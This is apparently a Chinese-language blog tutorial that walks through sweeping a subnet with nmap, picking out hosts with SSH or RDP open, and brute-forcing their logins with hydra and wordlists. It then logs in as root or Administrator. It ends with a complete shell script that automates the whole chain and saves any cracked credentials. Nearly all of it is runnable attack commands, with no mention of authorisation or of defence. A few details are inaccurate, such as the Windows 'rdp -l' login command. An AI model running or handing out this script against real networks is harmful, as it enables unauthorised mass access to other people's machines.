Linux下使用hydra获取linux和windows系统用户名和密码的教程
第一步:找到网段内存活的主机
使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下:
在命令行输入:nmap -sn 172.18.16.0/24 > up.txt
从up.txt里面过滤出ip地址存到ip.txt里面,代码如下:
cat up.txt | grep for | awk '{print $5}'>ip.txt
第二步:使用nmap工具扫描linux和windows的远程端口
linux系统:
cat /etc/ssh/sshd_config 命令查看linux的远程端口,linux的远程端口是22,ssh协议。
windows系统:
开始—运行–cmd下输入 netstat –nba ,命令查看linux的远程端口,windows的远程端口是3389,rdp协议。
查到远程登陆窗口后,使用nmap扫描22和3389的端口,代码如下:
nmap -p22,3389 -iL ip.txt > res.txt
第三步:从结果里过滤出22端口开着的ip地址
从结果里过滤出22端口开着的ip地址,存放到sship.txt里面,代码如下:
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt
sship.txt里面的ip地址都是ssh远程开着的linux系统,接下来我们只要用hydra得到它们的密码就可以远程登陆linux系统了。
第四步:从结果里过滤出3389端口开着的ip地址
从结果里过滤出3389端口开着的ip地址,存放到rdpip.txt里面,代码如下:
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>rdpip.txt
与第三步类似,rdpip.txt里面的ip地址都是rdp远程开着的windows系统,接下来我们只要用hydra得到它们的密码就可以远程登陆windows系统了。
第五步:使用hydra暴力**linux密码
在命令行输入以下命令:
hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt
这段shell使用了user.txt用户名词典和passwd.txt密码词典以及开启ssh服务的ip地址,使用hydra进行暴力**,从暴破结果中过滤取出ip地址对应的用户名和密码。
第六步:使用hydra暴力**windows密码
hydra -L user.txt -P passwd.txt -M rdpip.txt rdp | grep passwd >> find.txt
与第五步相仿,不同的只是协议和ip地址。
第七步:使用找到的密码远程登陆
linux远程连接命令:
ssh -l root 172.18.*.*
输入这个命令之后,系统会提示你输入密码passwd:,这时候你输入获取的密码就可以远程登陆了。
windows远程连接命令:
rdp -l Administrator 172.18.*.*
根据提示输入密码,就可以远程登陆了。
最后,我把这些命令写成了一个shell,如下:
- #!/bin/sh
- para1=$#
- para2=$1
- if [ $para1 -eq 0 ]; then
- echo "请输入你的位置变量"
- else
- echo "-------------------stpe1 check up host list---------------------------"
- echo "nmap -sn $para2 , please wait for moment......"
- nmap -sn "$para2">up.txt
- cat up.txt | grep for | awk '{print $5}'>ip.txt
- echo "up host is done , save to up.txt"
- echo "-------------------stpe2 port check 22 and 3389-----------------------"
- echo "22 and 3389 port checking... please wait for moment......"
- nmap -p22,3389 -iL ip.txt > res.txt
- echo "-------------------stpe3 select 22 port------------------------------"
- echo "doing 22 save to sship.txt"
- cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt
- echo "-------------------stpe4 select 3389 port----------------------------"
- echo "doing 3389 save to 3389ip.txt"
- cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>rdpip.txt
- echo "-----------------------------stpe5 attack ssh------------------------"
- hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt
- echo "-------------------------stpe6 attack 3389---------------------------"
- hydra -L user.txt -P passwd.txt -M rdpip.txt rdp | grep passwd >> find.txt
- cat -n find.txt
- fi
shell运行截图:
PS: SMB:445 rdp :3389 SSH:22